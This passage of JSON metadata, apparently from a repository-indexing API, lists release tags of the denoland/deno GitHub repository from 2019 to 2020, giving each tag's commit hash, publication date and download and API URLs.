ithub/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","ta